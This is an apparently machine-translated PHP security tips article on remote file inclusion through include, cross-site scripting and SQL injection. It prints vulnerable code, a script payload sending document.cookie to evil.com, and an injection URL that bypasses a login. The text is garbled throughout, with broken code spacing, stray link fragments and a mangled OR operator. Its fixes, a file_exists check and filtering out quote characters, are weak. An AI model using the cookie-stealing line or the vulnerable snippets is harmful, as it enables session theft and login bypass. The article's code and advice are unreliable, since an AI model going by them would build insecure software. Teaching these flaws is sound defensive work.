Summary of some hidden security code in php

The security of program code is the embodiment of a programmer's quality in many aspects of the development application. I will summarize my experience below. If you need to know about it, please refer to it.

 

Baidu. After open_basedir is set, only php scripts under the specified directory and subdirectory are executed.
If you use php to read a directory or file other than open_basedir, an error is reported.
Insufficient Permissions
Generally, virtual host providers are set to/tmp and/home.

This is a habit of users. We have to solve these problems. The following summarizes some php security problems.

1. Be careful when using include. Check whether the file exists locally to avoid security vulnerabilities.
For example:

The Code is as follows:	Copy code
<? Php Include $ module. '. php '; ?>

Assume that $ module is a global variable of function/42833.htm target = _ blank>.
This script gives attackers the opportunity to execute any php code on your server. For example, if the script is added after the browser url? Module = http://example.com/my. When php receives this url, the value of the "$ module" variable in the script will be set to http://example.com/my. So when php executes include, it is very dangerous ......
Solution: Close the register_globals or include in php. ini and check whether it is correct.

The Code is as follows:	Copy code
<? Php If (file_exists ($ module. '. php ')){ Include $ module. '. php '; } ?>

2. Run the script across sites.
Simply put, attackers can execute some client scripts, such as js, on the user's browser side, and then steal users' cookies or other important data.
For example, <script language = 'javascript '> document. location =? 'Http: // evil.com/cgi-bin/cookie.cgi? F = '+ document. cookie </script>
If you click the button, your local cookie information will be sent to someone's mailbox (this shows how easy it is to steal user information ).
3. SQL Injection
I personally think it is the negative impact of SQL's flexibility and ease of use.

The Code is as follows:	Copy code
<? Php $ Query "select login_id from users where user = '$ user' and pwd =' $ pw '"; Mysql_query ($ query ); ?>

For example
Http://example.com/login.php? User = admin' % 20OR % 20 (user = '& pwd =') % 20R % 20 user ='
Your php code may become.

The Code is as follows:	Copy code
<? Php $ Query = "select login_id from user where user = 'admin' or (user ='' and pwd = '') or user = ''"; Mysql_query ($ query ); ?>

You can use functions to filter out (') ("), (), and so on.